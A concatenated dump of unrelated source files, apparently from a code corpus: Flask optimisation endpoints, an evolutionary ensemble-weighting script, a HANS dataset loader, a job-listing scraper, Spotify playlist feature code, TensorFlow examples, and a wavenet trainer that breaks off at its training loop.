json_data = json.loads(params.decode('utf-8'))
metaData = json_data["meta"]
rawMetaData = metaData.replace('#', '\n')
filename = './simplex.txt'
with open(filename, 'w') as file_object:
file_object.write(rawMetaData)
    dataMin = np.loadtxt(filename, dtype=float)
    # print(data_min)
    value, base_list, base_value = Simplex.min(dataMin)
    dataMin = np.loadtxt(filename, dtype=float)
info = Simplex.formatString(dataMin, 0, value, base_list, base_value)
print(info)
result = {
'status': 20000,
'message': '这里你看到的是单纯形法',
"data": value,
"info": info
}
# cur.close()
# conn.close()
response = make_response(jsonify(result))
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
response.status = "200"
return response
@app.route('/simplexMax', methods=['GET', 'POST'])
def simplex_max():
params = request.get_data()
json_data = json.loads(params.decode('utf-8'))
metaData = json_data["meta"]
rawMetaData = metaData.replace('#', '\n')
filename = './simplex.txt'
with open(filename, 'w') as file_object:
file_object.write(rawMetaData)
    dataMax = np.loadtxt(filename, dtype=float)
    value, base_list, base_value = Simplex.max(dataMax)
    dataMax = np.loadtxt(filename, dtype=float)
info = Simplex.formatString(dataMax, 1, value, base_list, base_value)
result = {
'status': 20000,
'message': '这里你看到的是单纯形法',
"data": value,
"info": info
}
response = make_response(jsonify(result))
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
response.status = "200"
return response
@app.route('/transportation', methods=['GET', 'POST'])
def transportation():
params = request.get_data()
json_data = json.loads(params.decode('utf-8'))
metaData = json_data["meta"]
# print(metaData)
rawMetaData = metaData.replace('#', '\n')
filename = './transportation.txt'
with open(filename, 'w') as file_object:
file_object.write(rawMetaData)
    dataMax = np.loadtxt(filename, dtype=float)
# print(dataMax)
(width, length) = dataMax.shape
    # Names of the supply (origin) points
product = ['A' + str(i) for i in range(1, width)]
# print(product)
    # Names of the demand (destination) points
sale = ['B' + str(i) for i in range(1, length)]
# print(sale)
s = [(product[i], dataMax[i, length - 1]) for i in range(width - 1)]
d = [(sale[i], dataMax[width - 1, i]) for i in range(length - 1)]
# c = dataMax[:width - 1, :length - 1]
re = trans(tuple(product), tuple(sale), dataMax)
info = getString(s, d)
# print(s)
info += re
result = {
'status': 20000,
'message': '这里你看到的是单纯形法',
"info": info,
}
response = make_response(jsonify(result))
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
response.status = "200"
return response
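def _demo_simplex_max():
    """Hedged self-check, not part of the original service. The tableau layout
    (objective coefficients in row 0, slack identity columns before the final
    RHS column) is inferred from how Simplex.max() builds its initial basis.
    Maximises 2*x1 + 3*x2 subject to x1 + x2 <= 4 and x1 + 2*x2 <= 6."""
    tableau = np.array([
        [2., 3., 0., 0., 0.],  # objective row (last entry unused)
        [1., 1., 1., 0., 4.],  # x1 + x2 + s1 = 4
        [1., 2., 0., 1., 6.],  # x1 + 2*x2 + s2 = 6
    ])
    value, base_list, base_value = Simplex.max(tableau)
    # Expected optimum: value 10.0 with x1 = 2, x2 = 2
    print(value, base_list, base_value)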
if __name__ == '__main__':
'''
    The first line holds the objective coefficients,
    the remaining lines hold the constraints.
'''
    data_max = np.loadtxt("data-3.1.3.txt", dtype=float)
value, base_list, base_value = Simplex.max(data_max)
info = Simplex.formatString(data_max, 1, value, base_list, base_value)
print(info)
app.run(host="0.0.0.0")
| 9,083 |
eda/integration.py
|
viniCerutti/eel
| 0 |
2169961
|
"""
Proper EDA script.
"""
import copy
import random
from datetime import datetime as dt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from eda import Ensemble
def __get_elite__(P_fitness, A=None):
"""
    From the current population, selects as elite the individuals whose fitness is
    strictly below the population median (fitness is minimized).
:param P_fitness: Fitness of population.
:param A: Former elite population boolean array.
:return: Updated elite population boolean array.
"""
median = np.median(P_fitness)
if A is None:
A = P_fitness < median
else:
A[:] = P_fitness < median
return A
def __update__(P, A, loc):
"""
Update probabilistic graphical model based on elite population.
:param A: A boolean array denoting whether the individual in that index is from the elite or not.
:param P: The proper population of the EDA.
:param loc: Former means of the probabilistic graphical model.
:return: Updated mean for probabilistic graphical model.
"""
loc[:] = 0.
n_elite = np.count_nonzero(A)
for i in range(len(A)):
if A[i]:
loc += P[i].voting_weights
loc[:] /= float(n_elite)
return loc
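# Hedged mini-example of the update rule above: if the elite consists of two
# ensembles whose voting_weights are [[1., 3.]] and [[3., 5.]], the updated loc
# is the element-wise mean [[2., 4.]].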
def __get_best_individual__(P, P_fitness):
"""
Returns best individual from the population.
:param P: Proper population of individuals.
:param P_fitness: Fitness of population.
:return: The best individual from the population.
"""
return P[np.argmin(P_fitness)] # type: Ensemble
def __save__(reporter, generation, A, P, P_fitness, loc, scale):
"""
Saves metadata from EDA.
:param reporter: eda.Reporter
:param generation: generation index.
:param P: Population of individuals.
:param loc: Mean of probabilistic graphical model variables' PMF.
:param scale: Std deviation of probabilistic graphical model variables' PMF.
"""
try:
reporter.save_population(generation=generation, elite=A, ensembles=P, P_fitness=P_fitness)
reporter.save_gm(generation, loc, scale)
except AttributeError:
pass
def integrate(ensemble, n_individuals=100, n_generations=100, use_weights=True, reporter=None, verbose=True):
"""
Optimize voting weights for an ensemble of base classifiers.
:type ensemble: eda.Ensemble
:param ensemble: ensemble of base classifiers.
:type n_individuals: int
:param n_individuals: optional - number of individuals. Defaults to 100.
:type n_generations: int
:param n_generations: optional - number of generations. Defaults to 100.
:type use_weights: bool
:param use_weights: Whether to use former weights from AdaBoost or not.
:type reporter: reporter.EDAReporter
:param reporter: optional - reporter for storing data about the evolutionary process.
Defaults to None (no recording).
:type verbose: bool
    :param verbose: whether to output to console. Defaults to True.
:return: The same ensemble, with optimized voting weights.
"""
n_classifiers = ensemble.n_classifiers
n_classes = ensemble.n_classes
classes = ensemble.classes
# overrides prior seed
np.random.seed(None)
random.seed(None)
scale = 0.25
decay = scale / float(n_generations)
if use_weights:
loc = np.empty((n_classifiers, n_classes), dtype=np.float32)
loc[:] = ensemble.voting_weights[:]
else:
loc = np.random.normal(loc=1., scale=scale, size=(n_classifiers, n_classes)).astype(dtype=np.float32)
all_preds = ensemble.get_predictions(ensemble.X_train)
for i, some_class in enumerate(classes):
if n_classes == 2:
loc[:, i] = LogisticRegression().fit(all_preds.T, ensemble.y_train).coef_
break
else:
binary_preds = (all_preds == some_class).astype(np.int32)
loc[:, i] = LogisticRegression().fit(binary_preds.T, ensemble.y_train == some_class).coef_
P = []
for i in range(n_individuals):
P += [copy.deepcopy(ensemble)]
P_fitness = np.empty(n_individuals, dtype=np.float32)
A = np.zeros(n_individuals, dtype=np.int32)
t1 = dt.now()
last_median = 0
streak = 0
max_streak = 5
# ensemble_train_acc = accuracy_score(ensemble.y_train, ensemble.predict(ensemble.X_train))
# dfd = ensemble.dfd(ensemble.X_train, ensemble.y_train)
# print('generation %02.d: ens val acc: %.4f dfd: %.4f time elapsed: %f' % (
# -1, ensemble_train_acc, dfd, (dt.now() - t1).total_seconds()
# ))
# __save__(
# reporter=reporter, generation=-1, A=[0], P=[ensemble], P_fitness=[0], loc=loc, scale=scale
#)
g = 0
while g < n_generations:
for i in range(n_individuals):
if not A[i]:
P[i] = P[i].resample_voting_weights(loc=loc, scale=scale)
train_probs = P[i].predict_proba(P[i].X_train)
argtrain = np.argmax(train_probs, axis=1)
argwrong_train = np.flatnonzero(argtrain != P[i].y_train)
wrong_train = np.max(train_probs[argwrong_train, :], axis=1)
P_fitness[i] = np.sum(wrong_train)
A = __get_elite__(P_fitness, A=A)
best_individual = __get_best_individual__(P, P_fitness) # type: Ensemble
__save__(
reporter=reporter, generation=g, A=A, P=P, P_fitness=P_fitness, loc=loc, scale=scale
)
ensemble_train_acc = accuracy_score(ensemble.y_train, best_individual.predict(ensemble.X_train))
dfd = best_individual.dfd(ensemble.X_train, ensemble.y_train)
median = float(np.median(P_fitness, axis=0)) # type: float
if np.max(A) == 0:
break
if streak >= max_streak:
break
condition = (abs(last_median - median) < 0.01)
streak = (streak * condition) + condition
last_median = median
loc = __update__(P, A, loc)
scale -= decay
t2 = dt.now()
if verbose:
print('generation %02.d: ens val acc: %.4f dfd: %.4f median: %.4f time elapsed: %f' % (
g, ensemble_train_acc, dfd, median, (t2 - t1).total_seconds()
))
t1 = t2
g += 1
best_individual = __get_best_individual__(P, P_fitness) # type: Ensemble
__save__(
reporter=reporter, generation=g, A=A, P=P, P_fitness=P_fitness, loc=loc, scale=scale
)
return best_individual
| 6,519 |
latent_rationale/hans/hans_dataset.py
|
mikimn/interpretable_predictions
| 0 |
2169479
|
import datasets
class HansConfig(datasets.BuilderConfig):
"""BuilderConfig for HANS."""
def __init__(self, **kwargs):
"""BuilderConfig for HANS.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(HansConfig, self).__init__(version=datasets.Version("1.0.0", ""), **kwargs)
class Hans(datasets.GeneratorBasedBuilder):
"""Hans: Heuristic Analysis for NLI Systems."""
def _info(self):
return datasets.DatasetInfo(
description="HANS",
features=datasets.Features(
{
"premise": datasets.Value("string"),
"hypothesis": datasets.Value("string"),
"label": datasets.features.ClassLabel(names=["entailment", "non-entailment"]),
"parse_premise": datasets.Value("string"),
"parse_hypothesis": datasets.Value("string"),
"binary_parse_premise": datasets.Value("string"),
"binary_parse_hypothesis": datasets.Value("string"),
"heuristic": datasets.Value("string"),
"subcase": datasets.Value("string"),
"template": datasets.Value("string"),
}
),
supervised_keys=None,
homepage="https://github.com/tommccoy1/hans",
citation="HANS",
)
def _vocab_text_gen(self, filepath):
for _, ex in self._generate_examples(filepath):
yield " ".join([ex["premise"], ex["hypothesis"]])
def _split_generators(self, dl_manager):
train_path = dl_manager.download_and_extract(
"https://raw.githubusercontent.com/tommccoy1/hans/master/heuristics_train_set.txt"
)
valid_path = dl_manager.download_and_extract(
"https://raw.githubusercontent.com/tommccoy1/hans/master/heuristics_evaluation_set.txt"
)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepath": train_path}),
datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={"filepath": valid_path}),
]
def _generate_examples(self, filepath):
"""Generate hans examples.
Args:
filepath: a string
Yields:
dictionaries containing "premise", "hypothesis" and "label" strings
"""
for idx, line in enumerate(open(filepath, "rb")):
if idx == 0:
continue # skip header
line = line.strip().decode("utf-8")
split_line = line.split("\t")
# Examples not marked with a three out of five consensus are marked with
# "-" and should not be used in standard evaluations.
if split_line[0] == "-":
continue
# Works for both splits even though dev has some extra human labels.
yield idx, {
"premise": split_line[5],
"hypothesis": split_line[6],
"label": split_line[0],
"binary_parse_premise": split_line[1],
"binary_parse_hypothesis": split_line[2],
"parse_premise": split_line[3],
"parse_hypothesis": split_line[4],
"heuristic": split_line[8],
"subcase": split_line[9],
"template": split_line[10],
}
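# Hedged usage sketch (not part of the original loader): assuming this file is
# available locally as a `datasets` loading script, it could be loaded with
#     from datasets import load_dataset
#     hans = load_dataset("latent_rationale/hans/hans_dataset.py")
#     print(hans["validation"][0]["premise"], hans["validation"][0]["label"])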
| 3,437 |
JobFinder2000/spiders/job_spider.py
|
nickdehart/JobFinder2000
| 0 |
2167330
|
import scrapy
import re
import requests
from datetime import datetime
from pymongo import MongoClient
class JobSpider(scrapy.Spider):
name = "jobs"
def start_requests(self):
url_start = 'https://stackoverflow.com/jobs?r=true&ms=Junior&mxs=MidLevel&ss=1&sort=p'
urls = []
urls.append(url_start)
# only concerned with first 10 pages of results
for i in range(2, 11):
urls.append(url_start + '&pg=' + str(i))
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
client = MongoClient()
db = client.Jobs
collection = db.listings
for row in response.css('body div.container div.snippet-hidden div.main-columns div div.js-search-results div.listResults div'):
href = row.css('div.-job-summary div.-title h2 a::attr(href)').get()
try:
href = 'http://www.stackoverflow.com' + href
jobId = href.split('/')[-2]
except:
href = ''
jobId = ''
previous = collection.find_one({'jobId': jobId})
            if jobId and not previous:
                res = None  # guard: the request below may fail, which would otherwise leave res undefined
                try:
                    res = requests.get('https://stackoverflow.com/jobs/apply/' + jobId)
except Exception as e:
self.log(e)
try:
collection.insert_one( {
'jobId': jobId,
'title': row.css('div.-job-summary div.-title h2 a::text').get(),
'href': href,
'tags': row.css('div.-job-summary div.-tags a::text').getall(),
'perks': self.remove_whitespace(row.css('div.-job-summary div.-perks span::text').getall()),
'timestamp': datetime.now(),
'applied': False,
                        'external': True if (res is not None and res.status_code == 404) else False
} )
except Exception as e:
self.log(e)
def remove_whitespace(self, lst):
temp = [x.replace(" ", "") for x in lst]
temp = [x.replace("\n", "") for x in temp]
temp = [x.replace("\r", "") for x in temp]
return([x.replace("|", " | ") for x in temp])
def check_tags(self, tags):
my_tags = [
"python",
"django",
"python3",
"data-science",
"machine-learning",
"javascript",
"reactjs",
"angular",
"node.js",
"redux",
"objective-c",
"swift",
"xcode",
"typescript",
"vue.js",
"c++",
"bigdata",
"data-ingestion",
"elasticsearch",
"c",
"analytics",
"react",
"opencv",
"angularjs",
"next.js",
"ember.js",
"nodejs",
"pandas",
]
return any(x in my_tags for x in tags )
def check_salary(self, perks):
matches = []
for perk in perks:
            matches.extend(re.findall(r'\d{2,3}', perk))
return True if (all(int(x) > 50 for x in matches)) else False
| 3,727 |
tfoms/l2.py
|
Wellheor1/l2
| 10 |
2169334
|
import logging
from urllib.parse import urljoin
import requests
from appconf.manager import SettingManager
logger = logging.getLogger(__name__)
def get_url(path, base=None):
return urljoin(base or SettingManager.get("l2_patients_url", default='http://localhost/if', default_type='s'), path)
def get_headers(token=None):
return {"Authorization": "Bearer {}".format(token or SettingManager.get("l2_patients_token", default='token', default_type='s'))}
def make_request(path, json_data=None, base=None, token=None):
if json_data is None:
json_data = {}
text_resp = None
try:
url = get_url(path, base=base)
headers = get_headers(token=token)
data = requests.post(url, headers=headers, json=json_data)
text_resp = data.text
data = data.json()
return data
except Exception as e:
logger.exception(e)
logger.exception(text_resp)
return {}
def check_l2_enp(enp) -> dict:
data = make_request("check-enp", {"enp": enp, "check_mode": "l2-enp"})
return data
def check_l2_patient(family, name, patronymic, bd) -> dict:
data = make_request("check-enp", {"family": family, "name": name, "patronymic": patronymic, "bd": bd, "check_mode": "l2-enp-full"})
return data
def update_doc_call_status(external_num, status, oid, code_tfoms) -> dict:
data = make_request("doc-call-update-status", {"externalNum": external_num, "status": status, "org": {"oid": oid, "codeTFOMS": code_tfoms}})
return data
def send_doc_call(base, token, data) -> dict:
data = make_request("doc-call-send", data, base=base, token=token)
return data
| 1,655 |
trafficdb/wsgi.py
|
rjw57/trafficdb
| 1 |
2169765
|
"""
WSGI-compatible web application
===============================
"""
from flask import Flask
from flask_migrate import Migrate
def create_app():
# Create root webapp
app = Flask(__name__)
app.config.from_pyfile('defaultconfig.py')
# Register this app with the database
from trafficdb.models import db
db.init_app(app)
# Create migration helper
migrate = Migrate(app, db)
# Create blueprints
import trafficdb.blueprint as bp
for bp_name in bp.__all__:
app.register_blueprint(getattr(bp, bp_name), url_prefix='/'+bp_name)
return app
| 600 |
2020/Day10/day10_solution_part2.py
|
samyak-jn/AdventofCode
| 0 |
2167736
|
def get_values(filename):
with open(filename) as f:
data = f.read()
doc = data.split("\n")
li = []
for i in doc:
if i =="":
continue
li.append(int(i.strip()))
return li
if __name__=="__main__":
filename = "./input.txt"
input = get_values(filename)
input.append(0)
input = sorted(input)
inbuilt_adapter = input[-1]+3
input.append(inbuilt_adapter)
parse_ways = [0]*(max(input)+1)
parse_ways[0]=1
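    # DP over joltage values: an adapter rated j can follow one rated j-1, j-2 or
    # j-3, so ways[j] = ways[j-1] + ways[j-2] + ways[j-3]; joltages that are not
    # present in the input keep zero ways and contribute nothing to the sum.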
for i in input[1:]:
parse_ways[i] += parse_ways[i-1]
if i>=2:
parse_ways[i] += parse_ways[i-2]
if i>=3:
parse_ways[i] += parse_ways[i-3]
print(parse_ways[-1])
| 638 |
src/data_transformations.py
|
alexrobwong/spotify-playlist-success
| 0 |
2169840
|
import numpy as np
import logging
from copy import deepcopy
logging.basicConfig(level=logging.INFO)
def create_features(raw_frame):
"""
    Derive features from the original ones provided in the Spotify playlist success data.
    :param raw_frame: original dataframe from the case file "playlist_summary_external.txt"
"""
features_frame = (
raw_frame.assign(monhtly_skips=lambda f: (f["streams"] - f["stream30s"]) * 30)
.assign(tracks_per_album=lambda f: f["n_tracks"] / f["n_albums"])
.assign(artists_per_album=lambda f: f["n_artists"] / f["n_albums"])
.assign(
owner_stream=lambda f: np.where(f["monthly_owner_stream30s"] == 0, 0, 1)
)
.assign(
mau_adjusted=lambda f: np.where(
f["owner_stream"] == 1, f["mau"] - 1, f["mau"]
)
)
.assign(
users_adjusted=lambda f: np.where(
f["owner_stream"] == 1, f["users"] - 1, f["users"]
)
)
.assign(
monhtly_non_owner_stream30s=lambda f: f["monthly_stream30s"]
- f["monthly_owner_stream30s"]
)
.assign(
streaming_ratio_mau=lambda f: f["monhtly_non_owner_stream30s"]
/ f["mau_adjusted"]
)
.assign(
streaming_ratio_users=lambda f: f["monhtly_non_owner_stream30s"]
/ f["users_adjusted"]
)
.assign(skip_ratio_users=lambda f: f["monhtly_skips"] / f["users"])
.assign(mau_perc=lambda f: f["mau"] / f["users"])
.assign(mau_new=lambda f: f["mau"] - f["mau_previous_month"])
.assign(
mau_new_perc=lambda f: np.where(
f["mau_previous_month"] == 0,
0,
f["mau_new"] / f["mau_previous_month"] * 100,
)
)
)
# How many tokens in each playlist title?
count_tokens = []
for token in list(features_frame["tokens"]):
count_tokens.append(len(eval(token)))
features_frame["title_length"] = count_tokens
# Extracting user_id and playlist_id
list_user = []
list_playlist = []
for playlist_uri in features_frame["playlist_uri"]:
tokens = playlist_uri.split(":")
list_user.append(tokens[2])
list_playlist.append(tokens[4])
features_frame["user_id"] = list_user
features_frame["playlist_id"] = list_playlist
return features_frame.reset_index(drop=True)
def classify_success(feature_frame, users_threshold=10, success_threshold=0.75):
"""
Label playlists as successful based on if their streaming ratio is above a certain threshold
"""
    # note: the original asserted a tuple, which is always truthy
    assert users_threshold >= 10, (
        "Acoustic features from Spotify API only obtained for playlists with more than 10 "
        "monthly users"
    )
# Filtering out playlists with an outlier number of tracks
n_tracks_upper_quantile = feature_frame["n_tracks"].quantile(0.75)
n_tracks_lower_quantile = feature_frame["n_tracks"].quantile(0.25)
iqr = n_tracks_upper_quantile - n_tracks_lower_quantile
upper_track_limit = n_tracks_upper_quantile + (1.5 * iqr)
lower_track_limit = n_tracks_lower_quantile - (1.5 * iqr)
target_frame = (
feature_frame.loc[lambda f: f["n_tracks"] <= upper_track_limit]
.loc[lambda f: f["n_tracks"] >= lower_track_limit]
.loc[lambda f: f["users_adjusted"] > users_threshold]
).reset_index(drop=True)
num_playlists_all = len(feature_frame)
num_playlists_thresh = len(target_frame)
logging.info(f"# of playlists: {num_playlists_all}")
logging.info(f"# of playlists above the users_threshold: {num_playlists_thresh}")
    logging.info(f"# of playlists removed: {num_playlists_all - num_playlists_thresh}")
logging.info(
f"% of playlists remaining: {round(num_playlists_thresh / num_playlists_all * 100, 1)}"
)
threshold_frame_plays = target_frame.groupby("genre_1").quantile(
q=success_threshold
)[["streaming_ratio_users"]]
threshold_frame_plays.columns = [
str(col) + "_thresh" for col in threshold_frame_plays.columns
]
success_frame = target_frame.merge(
threshold_frame_plays.reset_index()[
[
"genre_1",
"streaming_ratio_users_thresh",
]
],
on="genre_1",
how="left",
).assign(
success_streaming_ratio_users=lambda f: np.where(
f["streaming_ratio_users"] >= f["streaming_ratio_users_thresh"], 1, 0
)
)
return success_frame
def add_suffixes(frame, suffix):
renamed_frame = deepcopy(frame)
renamed_frame.columns = [
str(col) + suffix if col not in ["track_id", "user_id", "playlist_id"] else col
for col in renamed_frame.columns
]
return renamed_frame
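# Hedged usage sketch (not part of the original module; assumes the case file
# named in the create_features docstring is available locally and tab-separated):
#     import pandas as pd
#     raw = pd.read_csv("playlist_summary_external.txt", sep="\t")
#     success = classify_success(create_features(raw))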
| 4,862 |
HW1-2/add_layer_homework.py
|
killua4564/DeepLearningHW
| 0 |
2169917
|
import tensorflow as tf
import numpy as np
# Define a helper function that adds a fully-connected layer
def add_layer(inputs, input_tensors, output_tensors, activation_function = None):
W = tf.Variable(tf.random_normal([input_tensors, output_tensors]))
b = tf.Variable(tf.zeros([1, output_tensors]))
formula = tf.add(tf.matmul(inputs, W), b)
if activation_function is None:
outputs = formula
else:
outputs = activation_function(formula)
return outputs
# Prepare the data
x_data = np.random.rand(100)
x_data = x_data.reshape(len(x_data), 1)
y_data = x_data * 0.1 + 0.3
# Build the feeds (placeholders)
feeds_data = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [0]]
x_feeds = tf.placeholder(tf.float32, shape = [10, 1])
y_feeds = tf.placeholder(tf.float32, shape = [10, 1])
# Add one hidden layer
hidden_layer = add_layer(x_feeds, input_tensors = 1, output_tensors = 10, activation_function = None)
# Add one output layer
output_layer = add_layer(hidden_layer, input_tensors = 10, output_tensors = 1, activation_function = None)
# Define the `loss` and the optimizer to use
loss = tf.reduce_mean(tf.square(y_feeds - output_layer))
optimizer = tf.train.GradientDescentOptimizer(learning_rate = 0.01)
train = optimizer.minimize(loss)
# Initialize the graph and start training
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(201):
    sess.run(train, feed_dict = {x_feeds: feeds_data, y_feeds: feeds_data})  # run the training op (the original ran output_layer only, so nothing was optimized)
if step % 20 == 0:
print(sess.run(loss, feed_dict = {x_feeds: feeds_data, y_feeds: feeds_data}))
sess.close()
| 1,527 |
core/management/commands/ensuremongocollections.py
|
fruviad/combine
| 24 |
2169672
|
# generic imports
import logging
# django
from django.core.management.base import BaseCommand, CommandError
# import core
from core.models import *
# Get an instance of a logger
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = 'Ensure Mongo collections are created, and have proper indices'
def handle(self, *args, **options):
# Record model
logger.debug('ensuring indices for record collection')
Record.ensure_indexes()
# RecordValidation model
logger.debug('ensuring indices for record_validation collection')
RecordValidation.ensure_indexes()
# IndexMappingFailure model
logger.debug('ensuring indices for index_mapping_failures collection')
IndexMappingFailure.ensure_indexes()
# return
self.stdout.write(self.style.SUCCESS('Mongo collections and indices verified and/or created'))
| 914 |
wn_trainer.py
|
cbquillen/wavenet_experiment
| 2 |
2169999
|
#!/usr/bin/env python
'''
This is a quick demo hack of a wavenet trainer, with some help
of infrastructure from ibab.
<NAME>
'''
from __future__ import print_function
from six.moves import range
from functools import reduce
import optparse
import sys
import time
from operator import mul
import tensorflow as tf
import tensorflow.contrib.layers as layers
from audio_reader import AudioReader
from wavenet import wavenet, compute_overlap
# Options from the command line:
parser = optparse.OptionParser()
parser.add_option('-p', '--param_file', dest='param_file',
default=None, help='File to set parameters')
parser.add_option('-l', '--logdir', dest='logdir',
default=None, help='Tensorflow event logdir')
parser.add_option('-a', '--audio_root_dir', default='.',
help='Root directory for the training audio.')
parser.add_option('-i', '--input_file', dest='input_file',
default=None, help='Input checkpoint file')
parser.add_option('-o', '--output_file', dest='output_file',
default='ckpt', help='Output checkpoint file')
parser.add_option('-d', '--data', dest='data_list',
default='slt_f0b.txt', help='Corpus database file')
parser.add_option('-c', '--checkpoint_rate', dest='checkpoint_rate',
type=int, default=1000, help='Rate to checkpoint.')
parser.add_option('-s', '--summary_rate', dest='summary_rate',
type=int, default=20, help='Rate to output summaries.')
parser.add_option('-S', '--silence_threshold', dest='silence_threshold',
type=float, default=0.2,
help='Silence classifier energy threshold')
parser.add_option('-Z', '--audio_chunk_size', dest='audio_chunk_size',
type=int, default=500, help='Audio chunk size per batch.')
parser.add_option('-L', '--base_learning_rate', dest='base_learning_rate',
type=float, default=1e-03,
help='The initial learning rate. ' +
'lr = base_learning_rate/(1.0+lr_offet+timestep)*const)')
parser.add_option('-O', '--lr_offset', dest='lr_offset', type=int, default=0,
help="lr=base_learning_rate/(1.0+timestep+lr_offset)*const)")
parser.add_option('-H', '--histogram_summaries', dest='histogram_summaries',
action='store_true', default=False,
help='Do histogram summaries')
opts, cmdline_args = parser.parse_args()
# Options that can be set in a parameter file:
opts.canonical_epoch_size = 5000.0
opts.n_chunks = 10 # How many utterance chunks to train at once.
opts.input_kernel_size = 64 # The size of the input layer kernel.
opts.kernel_size = 4 # The size of other kernels.
opts.num_outputs = 128 # The number of convolutional channels.
opts.num_outputs2 = opts.num_outputs # The "inner" convolutional channels.
opts.skip_dimension = 512 # The dimension for skip connections.
opts.dilations = [[2**N for N in range(8)]] * 5
opts.epsilon = 1e-4 # Adams optimizer epsilon.
opts.max_steps = 400000
opts.sample_rate = 16000
opts.max_checkpoints = 30
opts.reverse = False # not used in this version..
opts.clip = 0.1
opts.context = 3 # 2 == biphone, 3 == triphone.
opts.n_phones = 41
opts.n_users = 1
opts.n_mfcc = 20
opts.mfcc_weight = 0.001
opts.nopad = False # True to use training without the padding method.
opts.dropout = 0.0
opts.feature_noise = 0.0
opts.r_scale = 1000.0 # Controls the minimum possible variance.
# Set opts.* parameters from a parameter file if you want:
if opts.param_file is not None:
with open(opts.param_file) as f:
exec(compile(f.read(), opts.param_file, 'exec'))
# smaller audio chunks increase the timesteps per epoch:
# this is normalized relative to a 100000 sample chunk.
opts.canonical_epoch_size *= 100000.0/(opts.audio_chunk_size*opts.n_chunks)
sess = tf.Session()
coord = tf.train.Coordinator() # Is this used for anything?
data = AudioReader(opts.audio_root_dir, opts.data_list, coord,
sample_rate=opts.sample_rate,
chunk_size=opts.audio_chunk_size,
overlap=0, reverse=False,
silence_threshold=opts.silence_threshold,
n_chunks=opts.n_chunks, queue_size=opts.n_chunks,
n_mfcc=opts.n_mfcc, context=opts.context)
assert opts.n_phones == data.n_phones
assert opts.n_users == data.n_users
data.start_threads(sess) # start data reader threads.
# Define the computational graph.
with tf.name_scope("input_massaging"):
batch, user, alignment, lf0, mfcc = \
data.dequeue(num_elements=opts.n_chunks)
# We will try to predict the batch from a slightly
# noisier version on the input.
orig_batch = batch
if opts.feature_noise > 0:
batch += tf.random_normal(tf.shape(batch), stddev=opts.feature_noise)
batch = tf.expand_dims(batch, -1)
wf_slice = slice(0, opts.audio_chunk_size)
in_user = user[:, wf_slice] if opts.n_users > 1 else None
mu, r, q, omfcc = wavenet(
(batch[:, wf_slice, :], in_user, alignment[:, wf_slice],
lf0[:, wf_slice]), opts, is_training=opts.base_learning_rate > 0)
with tf.name_scope("loss"):
label_range = slice(1, 1+opts.audio_chunk_size)
x = orig_batch[:, label_range]
delta = x - mu
the_exp = -r*tf.abs(delta) + q*delta
loss = tf.reduce_mean(-tf.log(0.5*(r-q*q/r)) - the_exp)
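    # Hedged reading: this looks like the negative log-likelihood of an
    # asymmetric-Laplace-style density p(delta) = 0.5*(r - q*q/r) * exp(-r*|delta| + q*delta),
    # which integrates to 1 whenever r > |q|.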
if opts.logdir is not None:
tf.summary.scalar(name="loss", tensor=loss)
# That should have created all training variables. Now we can make a saver.
saver = tf.train.Saver(tf.trainable_variables() +
tf.get_collection('batch_norm'),
max_to_keep=opts.max_checkpoints)
if opts.histogram_summaries:
    tf.summary.histogram(name="wavenet", values=mu)  # the original referenced an undefined `ms`; histogram the predicted mean instead
layers.summaries.summarize_variables()
reg_loss = tf.constant(0.0)
with tf.name_scope("mfcc_loss"):
mfcc_loss = tf.constant(0.0)
if opts.mfcc_weight > 0:
del_mfcc = mfcc - omfcc
mfcc_loss = tf.reduce_mean(del_mfcc*del_mfcc)
if opts.logdir is not None:
tf.summary.scalar(name='mfcc', tensor=mfcc_loss)
with tf.name_scope("reg_loss"):
if 'l2reg' in vars(opts):
reg_loss += sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
learning_rate = tf.placeholder(tf.float32, shape=())
# adams_epsilon probably should be reduced near the end of training.
adams_epsilon = tf.placeholder(tf.float32, shape=())
# We might want to run just measuring loss and not training,
# perhaps to see what the loss variance is on the training.
# in that case, set opts.base_learning_rate=0
if opts.base_learning_rate > 0:
with tf.name_scope("optimizer"):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate,
epsilon=adams_epsilon)
with tf.get_default_graph().control_dependencies(
tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
sum_loss = loss + opts.mfcc_weight*mfcc_loss + reg_loss
if opts.clip is not None:
gradients = optimizer.compute_gradients(
sum_loss, var_list=tf.trainable_variables())
clipped_gradients = [
(tf.clip_by_value(var, -opts.clip, opts.clip)
if var is not None else None, name)
for var, name in gradients]
minimize = optimizer.apply_gradients(clipped_gradients)
else:
minimize = optimizer.minimize(
sum_loss, var_list=tf.trainable_variables())
else:
minimize = tf.constant(0) # a noop.
if opts.logdir is not None:
summaries = tf.summary.merge_all()
init = tf.global_variables_initializer()
# Finalize the graph, so that any new ops cannot be created.
# this is good for avoiding memory leaks.
tf.get_default_graph().finalize()
print("Model variables:")
total_params = 0
for var in tf.trainable_variables() + tf.get_collection('batch_norm'):
vshape = var.get_shape().as_list()
total_params += reduce(mul, vshape)
print(" ", var.name, vshape)
print("Total model parameters:", total_params)
sys.stdout.flush()
if opts.logdir is not None:
summary_writer = tf.summary.FileWriter(logdir=opts.logdir,
graph=tf.get_default_graph())
# Initialize everything.
sess.run(init)
if opts.input_file is not None:
print("Restoring from", opts.input_file)
saver.restore(sess, opts.input_file)
# Main training loop:
last_time = time.time()
for global_step in range(opts.lr_offset, opts.max_steps):
